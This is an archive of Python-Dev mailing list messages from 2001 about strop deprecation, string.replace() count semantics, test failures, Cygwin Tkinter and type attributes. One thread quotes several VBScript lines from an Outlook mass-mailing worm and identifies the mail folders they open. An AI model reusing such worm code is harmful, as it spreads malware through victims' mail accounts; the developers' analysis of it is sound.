Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Thu May 10 03:07:40 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 21:07:40 -0400 Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz> Message-ID: >> PyObject *t = (PyObject *)op; >> PyString_InternInPlace(&t); [Greg Ewing] > If you want to keep it all on one line, you could try > > PyString_InternInPlace((PyObject **)&op); op is declared "register" so it's not strictly legal to apply the address-of operator to it regardless. Besides, Guido pays me by the line. or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly y'rs - tim From gward at python.net Thu May 10 03:08:58 2001 From: gward at python.net (Greg Ward) Date: Wed, 9 May 2001 21:08:58 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:00:36PM -0500 References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> Message-ID: <20010509210858.A3467@gerg.ca> On 09 May 2001, Guido van Rossum said: > In my mind, strop is obsolete. We keep it around because some losers > like to import it directly, but it's basically dead, and except for a > few functions, string.py doesn't use it any more. (The exceptions are > maketrans, lowercase, uppercase, whitespace.) Perhaps 2.2 should deprecate direct use of strop noisily -- warn when imported, except when imported by string.py. (No idea how you'd implement that, I'm just spouting off.) Then it could go away in 2.3. I don't think there's anything particularly controversial about 'strop' going away after one release with a deprecation warning -- it's not 'string', after all! (Ie. imported by every single scrap of Python code ever written before string methods came along, and by quite a lot since then.) Greg -- Greg Ward - nerd gward at python.net http://starship.python.net/~gward/ I joined scientology at a garage sale!!
From guido at digicool.com Thu May 10 04:12:55 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:12:55 -0500 Subject: [Python-Dev] Inconsistent string.replace() behavior In-Reply-To: Your message of "Wed, 09 May 2001 20:47:52 -0400." References: Message-ID: <200105100212.VAA00491@cj20424-a.reston1.va.home.com> > test_strop.py contains this line: > > test('replace', 'one!two!three!', 'one at two@three@', '!', '@', 0) > > string_tests.py has this: > > test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0) > > IOW, the test suite insists that > > strop.replace('one!two!three!', '!', '@', 0) > > replace all matches but that > > string.replace('one!two!three!', '!', '@', 0) > and > 'one!two!three!'.replace('!', '@', 0) > > replace nothing. > > I've been thrashing like a madman trying to fix a common bug in both modules > (in out-of-synch copies of mymemreplace), and every time I think I fix > something "the other" module breaks. The above appears to be why. > > My opinion: the test_strop.py test is in error, and so was strop_replace() > in stropmodule.c. I'm checking in changes accordingly, but won't mind > getting yelled at if you disagree. HMMMMMM! In Python 1.5, a count of zero always replaces all occurrences, both using string and using strop. In 2.0 and later, strop's replace(..., 0) still replaces all, but string's replaces none. The replace() method of strings and unicode objects agrees with string.py. I think this change was made in the sake of ease of documenting the behavior: special-casing the count of zero is unexpected. I very vaguely recall that it was discussed on this list. So this suggests that test_string is correct, and string.replace() (and the methods) shouldn't be "fixed"! But since we're not really supporting strop any more, I think that strop shouldn't be changed either. So we'll have to live with the difference -- sorry! 
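The count semantics Guido describes can be checked in present-day Python 3, where `strop` no longer exists and `str.replace` follows the string-method rule. The sketch below also includes a hypothetical `strop_style_replace` that emulates the old "count 0 means replace everything" behaviour. It special-cases only 0; how strop treated other values is not modelled.

```python
def strop_style_replace(s, old, new, count=0):
    """Hypothetical emulation of the old strop.replace() rule: count == 0
    means "replace every occurrence" (only count 0 is special-cased here)."""
    return s.replace(old, new, -1 if count == 0 else count)


s = "one!two!three!"

# Modern str.replace: omitting count (or passing -1) replaces everything,
# while count=0 replaces nothing.
print(s.replace("!", "@"))                  # one@two@three@
print(s.replace("!", "@", 0))               # one!two!three!
print(s.replace("!", "@", 1))               # one@two!three!
print(strop_style_replace(s, "!", "@", 0))  # one@two@three@
```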
--Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Thu May 10 03:13:20 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 21:13:20 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > In my mind, strop is obsolete. We keep it around because some losers > like to import it directly, but it's basically dead, and except for a > few functions, string.py doesn't use it any more. (The exceptions are > maketrans, lowercase, uppercase, whitespace.) So if Fred changes the docs to say it's obsolete, maybe we can actually rip out the buggy and redundant code it contains in about 2 years . cheeredly y'rs - tim From guido at digicool.com Thu May 10 04:25:43 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:25:43 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 21:08:58 -0400." <20010509210858.A3467@gerg.ca> References: <200105100200.VAA00411@cj20424-a.reston1.va.home.com> <20010509210858.A3467@gerg.ca> Message-ID: <200105100225.VAA00592@cj20424-a.reston1.va.home.com> > Perhaps 2.2 should deprecate direct use of strop noisily -- warn when > imported, except when imported by string.py. (No idea how you'd > implement that, I'm just spouting off.) Then it could go away in 2.3. I have had the necessary mods sitting in my directory for months (it was one of my first tests for using the warnings module), but decided against checking it in because I found there's quite a bit of code that triggered the warnings. Maybe I should check it in into 2.2a0, so developers can get used to it. > I don't think there's anything particularly controversial about 'strop' > going away after one release with a deprecation warning -- it's not > 'string', after all! (Ie. 
imported by every single scrap of Python code > ever written before string methods came along, and by quite a lot since > then.) Agreed. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 10 04:27:23 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 09 May 2001 21:27:23 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 21:13:20 -0400." References: Message-ID: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> > [Guido] > > In my mind, strop is obsolete. We keep it around because some losers > > like to import it directly, but it's basically dead, and except for a > > few functions, string.py doesn't use it any more. (The exceptions are > > maketrans, lowercase, uppercase, whitespace.) > > So if Fred changes the docs to say it's obsolete, maybe we can actually rip > out the buggy and redundant code it contains in about 2 years . Yes, but in the mean time the fact that it's buggy doesn't bother me at all. Let it be as buggy as it always was -- that's one more reason to stop using it! :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Thu May 10 03:33:52 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 21:33:52 -0400 Subject: [Python-Dev] Inconsistent string.replace() behavior In-Reply-To: <200105100212.VAA00491@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > HMMMMMM! In Python 1.5, a count of zero always replaces all > occurrences, both using string and using strop. In 2.0 and later, > strop's replace(..., 0) still replaces all, but string's replaces > none. The replace() method of strings and unicode objects agrees with > string.py. > > I think this change was made in the sake of ease of documenting the > behavior: special-casing the count of zero is unexpected. Yes, -1 == infinity is much clearer . 
> I very vaguely recall that it was discussed on this list. > > So this suggests that test_string is correct, and string.replace() > (and the methods) shouldn't be "fixed"! I didn't change their behavior wrt replace()'s interpretation of count, but to repair an unrelated bug (bogus MemoryError for an empty-string *result*) that happened to appear in both copies of mymemreplace sitting in the code base (one in stringobject.c, another but out-of-synch one in stropmodule.c). That's how stropmodule got sucked into this: to fix the gross null-string result bug common to both. > But since we're not really supporting strop any more, I think that > strop shouldn't be changed either. So we'll have to live with the > difference -- sorry! OK, I've restored the 0 == infinity semantics to strop.replace() and test_strop.py, but have not backed out the null-string result fix, nor the pain to make the mymemreplace clones identical again. From tim.one at home.com Thu May 10 04:00:30 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 22:00:30 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > Yes, but in the mean time the fact that it's buggy doesn't bother me > at all. Let it be as buggy as it always was -- that's one more reason > to stop using it! :-) I think that's unsustainable in this specific case: stringobject and stropmodule contained several utility functions with the same names that clearly started life as identical code. Over time they got out of synch, and when they punched me in the face today, I had no idea which was "right" and which "wrong". Turned out they both had the same bug, and the clearest way to fix it in stringobject.c without leaving a more inconsistent x-module mess was to bring the once-common utility routines back into synch. 
As /F said, though, the mymemreplace() approach is inefficient and "should be" replaced wholesale. If that's done in stringobject.c alone, great, then I won't care about the legacy routines in stropmodule.c either. What I can't abide is having one copy of a function in the codebase work and a clone of it not work -- unless you can keep the undocumented history of both in your mind at all times, you're just as likely to bump into the broken one first when searching the code base, and if you're unlucky never even realize it is "the broken one" (or, if you're lucky, bump into the good one too, and then pee away time trying to understand the differences). i-have-garbage-in-my-kitchen-too-but-i-put-it-in-a-bag-so-i-don't- eat-it-by-mistake-ly y'rs - tim From Jason.Tishler at dothill.com Thu May 10 04:06:15 2001 From: Jason.Tishler at dothill.com (Jason Tishler) Date: Wed, 9 May 2001 22:06:15 -0400 Subject: [Python-Dev] CygWin and Tkinter In-Reply-To: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 09:01:20PM -0500 References: <9dcmks+6aqf@eGroups.com> <200105100201.VAA00435@cj20424-a.reston1.va.home.com> Message-ID: <20010509220615.A1928@dothill.com> Mike, On Wed, May 09, 2001 at 09:01:20PM -0500, Guido van Rossum wrote: > > I am playing around with CygWin (which came with Pyhton 2.1 > > installed). While I can run command line programs, Tkinter is not > > part of the package. TCL/TK is installed and I have been able to > > build TK GUI's. How can I get Tkinter added to my Python package? > > Thanks. > > Beats me. Ask whoever produces the CygWin port. I am the Cygwin Python maintainer. Please see the following for my views on adding Tkinter support to Cygwin Python: http://sources.redhat.com/ml/cygwin/2001-04/msg01842.html If Tkinter support is important to you, then please submit the appropriate patches for consideration to the Python Patch Manager on SourceForge. 
Norman Vine has built a Cygwin Python that supports Tkinter. See the following for his build procedure: http://www.vso.cape.com/~nhv/files/python/ Perhaps you would like to collaborate with Norman on this effort? Thanks, Jason -- Jason Tishler Director, Software Engineering Phone: +1 (732) 264-8770 x235 Dot Hill Systems Corp. Fax: +1 (732) 264-8798 82 Bethany Road, Suite 7 Email: Jason.Tishler at dothill.com Hazlet, NJ 07730 USA WWW: http://www.dothill.com From tim.one at home.com Thu May 10 04:54:45 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 9 May 2001 22:54:45 -0400 Subject: [Python-Dev] test_mmap failing? Message-ID: I checked in a change to mmapmodule.c earlier today, to close a patch complaining about unused vrbl warnings. Here's the changed routine before ("value" is unused):

    mmap_read_byte_method(mmap_object *self, PyObject *args)
    {
        char value;
        char *where;
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
            return NULL;
        if (self->pos < self->size) {
            where = self->data + self->pos;
            value = (char) *(where);
            self->pos += 1;
            return Py_BuildValue("c", (char) *(where));
        } else {
            PyErr_SetString (PyExc_ValueError, "read byte out of range");
            return NULL;
        }
    }

and after:

    mmap_read_byte_method(mmap_object *self, PyObject *args)
    {
        CHECK_VALID(NULL);
        if (!PyArg_ParseTuple(args, ":read_byte"))
            return NULL;
        if (self->pos < self->size) {
            char value = self->data[self->pos];
            self->pos += 1;
            return Py_BuildValue("c", value);
        } else {
            PyErr_SetString (PyExc_ValueError, "read byte out of range");
            return NULL;
        }
    }

I'll be damned if I can see any semantic difference, and test_mmap worked fine on Windows after the change.
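Both versions of the routine implement the same contract: return the byte at `pos`, advance `pos`, and raise `ValueError` once `pos` reaches the end. A sketch of that contract from present-day Python 3 follows. Note that Python 3's `mmap.read_byte()` returns an `int`, whereas the 2001 C code built a one-character string with the `"c"` format. `read_all_bytes` is a made-up helper name.

```python
import mmap
import tempfile


def read_all_bytes(data):
    """Map a temporary file holding data and drain it with read_byte()."""
    if not data:
        return []  # an empty file cannot be mmap'ed
    out = []
    with tempfile.TemporaryFile() as f:
        f.write(data)
        f.flush()
        with mmap.mmap(f.fileno(), 0) as m:  # length 0 maps the whole file
            while True:
                try:
                    out.append(m.read_byte())  # returns the byte, advances pos
                except ValueError:  # raised once pos reaches the end
                    break
    return out


print(read_all_bytes(b"ab"))  # [97, 98]
```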
But Fred reported:

"""
the fix introduced breakage on Linux (kernel 2.2.17):

cj42289-a(.../python/linux-beowolf); ./python ../Lib/test/regrtest.py -v test_mmap
test_mmap
test_mmap
test test_mmap crashed -- exceptions.IOError: [Errno 22] Invalid argument
Traceback (most recent call last):
  File "../Lib/test/regrtest.py", line 246, in runtest
    __import__(test, globals(), locals(), [])
  File "../Lib/test/test_mmap.py", line 124, in ?
    test_both()
  File "../Lib/test/test_mmap.py", line 14, in test_both
    f.write('\0'* PAGESIZE)
IOError: [Errno 22] Invalid argument
1 test failed: test_mmap
"""

However, at the point that's failing, test_mmap hasn't even *created* an mmap'ed file yet, let alone tried to read from it. The only thing test_mmap did so far is (the first comment is bogus -- that's the builtin Python open() function):

    # Create an mmap'ed file      # THIS IS A BOGUS COMMENT
    f = open('foo', 'w+')

    # Write 2 pages worth of data to the file
    f.write('\0'* PAGESIZE)       # THIS IS THE LINE IT'S DYING ON

But having suffered too many "impossible problems" the last 36 hours, my confidence is shot <0.93 wink>. Is test_mmap failing for anyone else under current CVS? Fred, are you *sure* it fails for you -- if so, does the problem actually go away if you revert mmapmodule.c?

looking-for-sense-in-all-the-wrong-places-ly y'rs - tim From jeremy at digicool.com Thu May 10 05:17:34 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Wed, 9 May 2001 23:17:34 -0400 (EDT) Subject: [Python-Dev] test_mmap failing? In-Reply-To: References: Message-ID: <15098.2126.368714.159135@slothrop.digicool.com> The latest CVS build works on my Linux 2.2.12 system. No problem with test_mmap. But test_pty does fail with some complaints about FCNTL, which Fred just removed. Maybe Fred is working in an alternate universe where test_mmap and test_pty are swapped. Jeremy From barry at digicool.com Thu May 10 06:08:42 2001 From: barry at digicool.com (Barry A.
Warsaw) Date: Thu, 10 May 2001 00:08:42 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <15098.5194.677531.35326@anthem.wooz.org> >>>>> "TP" == Tim Peters writes: TP> Oh, fuck. Somebody remind me why we have both stropmodule.c TP> and stringobject.c? These bugs exist in both. IIRC, I once proposed to share code bases through elaborate #includes and exported functions, but that never went very far. Guido's already pronounced on this, and I'd say good riddance to strop. >>>>> "GvR" == Guido van Rossum writes: GvR> Yes, but in the mean time the fact that it's buggy doesn't GvR> bother me at all. Let it be as buggy as it always was -- GvR> that's one more reason to stop using it! :-) -----------------------------------^^^^ For a minute there, I thought you said "to strop using it". :) -Barry From fredrik at pythonware.com Thu May 10 08:22:53 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Thu, 10 May 2001 08:22:53 +0200 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 References: Message-ID: <004001c0d919$a62de7d0$e46940d5@hagrid> Tim Peters wrote: > I think that's unsustainable in this specific case: stringobject and > stropmodule contained several utility functions with the same names that > clearly started life as identical code. Over time they got out of synch, and > when they punched me in the face today, I had no idea which was "right" and > which "wrong". Turned out they both had the same bug, and the clearest way > to fix it in stringobject.c without leaving a more inconsistent x-module mess > was to bring the once-common utility routines back into synch. > > As /F said, though, the mymemreplace() approach is inefficient and "should > be" replaced wholesale. If that's done in stringobject.c alone, great, then > I won't care about the legacy routines in stropmodule.c either. 
as a footnote, SRE uses the same source code to generate both 8-bit and 16-bit versions of the match engine. I see no reason why we cannot do the same for the string operations (PyString, PyUnicode, and strop). if anyone wants me to look into this, just say "go ahead". > > no wonder u"".replace() is 30% faster than "".replace() ;-) > > For a given number of characters or bytes ? characters. judging from the SRE benchmarks, modern platforms can process 16-bit characters as fast as they can process 8-bit characters. Cheers /F From thomas at xs4all.net Thu May 10 11:31:38 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 10 May 2001 11:31:38 +0200 Subject: [Python-Dev] Homepage In-Reply-To: <200105091712.TAA05172@core.inf.ethz.ch>; from pedroni@inf.ethz.ch on Wed, May 09, 2001 at 07:12:20PM +0200 References: <200105091712.TAA05172@core.inf.ethz.ch> Message-ID: <20010510113138.K16486@xs4all.nl> On Wed, May 09, 2001 at 07:12:20PM +0200, Samuele Pedroni wrote: > Set s=CreateObject("Outlook.Application") > Set t=s.GetNameSpace("MAPI") > Set u=t.GetDefaultFolder(6) [..] > Set u=t.GetDefaultFolder(3) I know it's off-topic, but Greg started it! ;-) Does anyone know which folders those two 'GetDefaultFolder' statements open ? I suspect it's sent-mail and trash, or some such, but I don't know enough about Outlook to know if it even *has* sent-mail and trash folders :) Thanx for sending it through, Samuele, it was fun reading, and useful to our helpdesk (especially the fact that it only sends out mails once, even though it starts the porn page every time, and that it doesn't do anything harmful at all.) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! 
From MarkH at ActiveState.com Thu May 10 12:36:13 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Thu, 10 May 2001 20:36:13 +1000 Subject: [Python-Dev] Homepage In-Reply-To: <20010510113138.K16486@xs4all.nl> Message-ID: > > Set u=t.GetDefaultFolder(6) > > Set u=t.GetDefaultFolder(3) > I know it's off-topic, but Greg started it! ;-) Does anyone know which > folders those two 'GetDefaultFolder' statements open ? I suspect it's > sent-mail and trash, or some such, but I don't know enough about > Outlook to > know if it even *has* sent-mail and trash folders :) Running makepy.py over the Outlook type library yields the following:

    olFolderCalendar     =0x9   # from enum OlDefaultFolders
    olFolderContacts     =0xa   # from enum OlDefaultFolders
    olFolderDeletedItems =0x3   # from enum OlDefaultFolders
    olFolderDrafts       =0x10  # from enum OlDefaultFolders
    olFolderInbox        =0x6   # from enum OlDefaultFolders
    olFolderJournal      =0xb   # from enum OlDefaultFolders
    olFolderNotes        =0xc   # from enum OlDefaultFolders
    olFolderOutbox       =0x4   # from enum OlDefaultFolders
    olFolderSentMail     =0x5   # from enum OlDefaultFolders
    olFolderTasks        =0xd   # from enum OlDefaultFolders

So it appears they are the inbox and deleted items. Mark. From tim.one at home.com Thu May 10 10:54:42 2001 From: tim.one at home.com (Tim Peters) Date: Thu, 10 May 2001 04:54:42 -0400 Subject: [Python-Dev] test___all__ failing on WIndows Message-ID:

    > python ../lib/test/regrtest.py test___all__
    test___all__
    test test___all__ failed -- tty has no __all__ attribute
    1 test failed: test___all__

    C:\Code\python\dist\src\PCbuild>

I assume this is yet another case where some excruciatingly non-obvious sequence of failing imports manages to leave behind a damaged module object in sys.modules that prevents test___all__'s import of tty from getting the ImportError it *ought* to get under Windows (and betting termios is the ultimate culprit). I've fixed enough of these. Somebody who thinks this is "a feature" gets to do it this time .
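When an import fails somewhere inside a chain of imports, the exception itself can name the module that was actually missing. The sketch below assumes present-day Python 3, where `ImportError.name` exists and a failed import removes the half-initialized module from `sys.modules` instead of leaving it behind. The module names `outer_mod_demo` and `missing_inner_mod_demo` are hypothetical; the throwaway module is written to a temporary directory on the fly.

```python
import importlib
import os
import sys
import tempfile


def diagnose_import(outer_source):
    """Write a throwaway module, import it, and report which module the
    resulting ImportError names and whether the outer module lingers in
    sys.modules. Returns None if the import succeeds."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "outer_mod_demo.py"), "w") as f:
            f.write(outer_source)
        sys.path.insert(0, d)
        importlib.invalidate_caches()  # make sure the new file is seen
        try:
            importlib.import_module("outer_mod_demo")
        except ImportError as exc:
            # exc.name is the module that could not be found, which may be
            # an inner dependency rather than the module we asked for
            return exc.name, "outer_mod_demo" in sys.modules
        else:
            return None
        finally:
            sys.path.remove(d)
            sys.modules.pop("outer_mod_demo", None)


print(diagnose_import("import missing_inner_mod_demo\n"))
# ('missing_inner_mod_demo', False)
```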
From guido at digicool.com Thu May 10 15:43:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 08:43:07 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: Your message of "Wed, 09 May 2001 22:00:30 -0400." References: Message-ID: <200105101343.IAA01450@cj20424-a.reston1.va.home.com> > [Guido] > > Yes, but in the mean time the fact that it's buggy doesn't bother > > me at all. Let it be as buggy as it always was -- that's one more > > reason to stop using it! :-) [Tim] > I think that's unsustainable in this specific case: stringobject and > stropmodule contained several utility functions with the same names > that clearly started life as identical code. Over time they got out > of synch, and when they punched me in the face today, I had no idea > which was "right" and which "wrong". Turned out they both had the > same bug, and the clearest way to fix it in stringobject.c without > leaving a more inconsistent x-module mess was to bring the > once-common utility routines back into synch. Of course, the real bug was copy-and-paste programming. The common code should have been factored out rather than copied. > As /F said, though, the mymemreplace() approach is inefficient and > "should be" replaced wholesale. If that's done in stringobject.c > alone, great, then I won't care about the legacy routines in > stropmodule.c either. What I can't abide is having one copy of a > function in the codebase work and a clone of it not work -- unless > you can keep the undocumented history of both in your mind at all > times, you're just as likely to bump into the broken one first when > searching the code base, and if you're unlucky never even realize it > is "the broken one" (or, if you're lucky, bump into the good one > too, and then pee away time trying to understand the differences). Here's an idea. 
We remove stropmodule.c, and replace it with a strop.py that issues a warning and then imports selected things from string.py. The only complication is that there are a few constants and one function in strop that are still imported into string.py; I propose to move these to an "internal" extension module (e.g. "_string"). --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Thu May 10 16:02:59 2001 From: guido at digicool.com (Guido van Rossum) Date: Thu, 10 May 2001 09:02:59 -0500 Subject: [Python-Dev] test_mmap failing? In-Reply-To: Your message of "Wed, 09 May 2001 23:17:34 -0400." <15098.2126.368714.159135@slothrop.digicool.com> References: <15098.2126.368714.159135@slothrop.digicool.com> Message-ID: <200105101402.JAA01678@cj20424-a.reston1.va.home.com> > The latest CVS build works on my Linux 2.2.12 system. No problem with > test_mmap. But test_pty does fail with some complaints about FCNTL, > which Fred just removed. Maybe Fred is working in an alternate > universe where test_mmap and test_pty are swapped. Strange. They *both* work for me with the latest CVS (and even after removing all *.pyc files!), although last night (?) I recall seeing a test_pty failure too. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Thu May 10 16:16:24 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 10 May 2001 09:16:24 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> References: <200105100227.VAA00607@cj20424-a.reston1.va.home.com> Message-ID: <15098.41656.128146.826459@beluga.mojam.com> Guido> Yes, but in the mean time the fact that it's buggy doesn't bother Guido> me at all. Let it be as buggy as it always was -- that's one Guido> more reason to stop using it! :-) In fact, perhaps the import warning could mention that strop is buggy and won't be fixed...
:-) Skip From skip at pobox.com Thu May 10 16:32:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Thu, 10 May 2001 09:32:15 -0500 Subject: [Python-Dev] test___all__ failing on WIndows In-Reply-To: References: Message-ID: <15098.42607.84670.323361@beluga.mojam.com> >> python ../lib/test/regrtest.py test___all__ Tim> test___all__ Tim> test test___all__ failed -- tty has no __all__ attribute Tim> 1 test failed: test___all__ grumble, grumble... Tim> I assume this is yet another case where some excruciatingly Tim> non-obvious sequence of failing imports manages to leave behind a Tim> damaged module object in sys.modules that prevents test___all__'s Tim> import of tty from getting the ImportError it *ought* to get under Tim> Windows (and betting termios is the ultimate culprit). I (thankfully) gave up even pretending to run Windows recently, so I can only make a suggestion for others who look into this problem. Try this: Change test___all__.check_all so that the except clause reads:

    except ImportError, msg:

then print out msg when an import fails. You should get the actual module that failed to import. If foo.py consists of simply "import bar", and I import it, I see that bar couldn't be imported:

    >>> try:
    ...     import foo
    ... except ImportError, msg:
    ...     print msg
    ...
    No module named bar

Skip From fdrake at acm.org Thu May 10 16:57:59 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 10 May 2001 10:57:59 -0400 (EDT) Subject: [Python-Dev] Re: test_mmap failing? In-Reply-To: References: Message-ID: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com> Tim Peters writes: > But having suffered too many "impossible problems" the last 36 hours, my > confidence is shot <0.93 wink>. Is test_mmap failing for anyone else under > current CVS? Fred, are you *sure* it fails for you -- if so, does the > problem actually go away if you revert mmapmodule.c? It was indeed showing the behavior I described!
I figured out what it was this morning and closed the patch again. The problem, of course(!), had nothing to do with mmap, before or after any of the recent changes to mmap. Or any old changes. It had a lot to do with the change I made to the socket module. ;-) While figuring out the reported bug in the socket module, I created named pipes, including one named "foo". The mmap test opens a file "foo" with mode "w+" in the directory in which I just happened to create the named pipe, so it ended up with a file object opened on a pipe -- things just don't work the same for these beasts! Needless to say test_mmap failed with a cryptic error message. This begs the question, though -- should tests that create temp files check that the files don't already exist, and fail with a more descriptive error if they do? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Thu May 10 16:59:08 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Thu, 10 May 2001 10:59:08 -0400 (EDT) Subject: [Python-Dev] test_mmap failing? In-Reply-To: <15098.2126.368714.159135@slothrop.digicool.com> References: <15098.2126.368714.159135@slothrop.digicool.com> Message-ID: <15098.44220.515660.330116@cj42289-a.reston1.va.home.com> Jeremy Hylton writes: > The latest CVS build works on my Linux 2.2.12 system. No problem with > test_mmap. But test_pty does fail with some complaints about FCNTL, > which Fred just removed. Maybe Fred is working in an alternate > universe where test_mmap and test_pty are swapped. Or, I could just be working in an alternate universe altogether. I've been known to do that.... -Fred -- Fred L. Drake, Jr. 
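Fred's question about tests that create temp files has a cheap answer on the Python side: create the file exclusively. Then a leftover file, or a named pipe called `foo` as in this case, makes the test fail with a clear message instead of a confusing `IOError`. The sketch below assumes Python 3.3 or later, where `open()` accepts mode `"x"` (exclusive creation). `create_fresh` is a hypothetical helper name. Getting a unique name from `tempfile.mkstemp()` would avoid the collision altogether.

```python
import os
import tempfile


def create_fresh(path, data):
    """Create path for writing only if nothing exists there yet.

    Mode "x" maps to O_CREAT | O_EXCL, so the open fails for *any* existing
    path (regular file, named pipe, ...) instead of silently reusing it."""
    try:
        with open(path, "xb") as f:
            f.write(data)
    except FileExistsError:
        raise RuntimeError(
            f"{path!r} already exists; remove it before running this test"
        ) from None


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "foo")
        create_fresh(path, b"\0" * 4096)
        try:
            create_fresh(path, b"")
        except RuntimeError as exc:
            print(exc)
```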
PythonLabs at Digital Creations From paulp at ActiveState.com Thu May 10 23:55:36 2001 From: paulp at ActiveState.com (Paul Prescod) Date: Thu, 10 May 2001 14:55:36 -0700 Subject: [Python-Dev] Type/class Message-ID: <3AFB0E58.1F0ABCA6@ActiveState.com> -------- Original Message -------- Log Message: Make attributes of subtypes writable, but only for dynamic subtypes derived in Python using a class statement; static subtypes derived in C still have read-only attributes. -------- Original Message -------- I would like to argue that "plain old C types" should act as if they have __dict__s for consistency with other types. It is sometimes useful to be able to annotate objects by adding attributes to them. But this only works with class instance objects, not instances of types. Paul Prescod From jeremy at digicool.com Thu May 10 23:59:34 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Thu, 10 May 2001 17:59:34 -0400 (EDT) Subject: [Python-Dev] Type/class In-Reply-To: <3AFB0E58.1F0ABCA6@ActiveState.com> References: <3AFB0E58.1F0ABCA6@ActiveState.com> Message-ID: <15099.3910.648127.25900@slothrop.digicool.com> >>>>> "PP" == Paul Prescod writes: PP> I would like to argue that "plain old C types" should act as if PP> they have __dict__s for consistency with other types. It is PP> sometimes useful to be able to annotate objects by adding PP> attributes to them. But this only works with class instance PP> objects, not instances of types. Every type should have an __dict__ of type dict? Then every dict must have an __dict__, including the __dict__ of __dict__? Once every object has an __dict__, every object will be mutable. Then no object will be usable as a dict key and we can get rid of dict's entirely. 
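Paul's request and Jeremy's objection can be checked against present-day Python 3 (not the 2001 descr-branch). Instances of a built-in type such as `dict` have no per-instance `__dict__`, while instances of a Python-level subclass do. The default hash of an ordinary class instance is identity-based, so attaching or changing attributes does not stop it from working as a dict key. The class and function names below are hypothetical.

```python
class AnnotatableDict(dict):
    """A Python-level subclass of a built-in type."""


class Node:
    """An ordinary class whose instances carry a __dict__."""


def can_annotate(obj):
    """Return True if an arbitrary attribute can be attached to obj."""
    try:
        obj.note = "hello"
    except AttributeError:
        return False
    return True


print(can_annotate({}))                 # False: built-in dict instances have no __dict__
print(can_annotate(AnnotatableDict()))  # True: subclass instances get one

# Mutable attributes do not make an object unusable as a dict key: the
# default hash is identity-based and ignores the instance's attributes.
n = Node()
table = {n: "found"}
n.label = "changed"
print(table[n])                         # found
```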
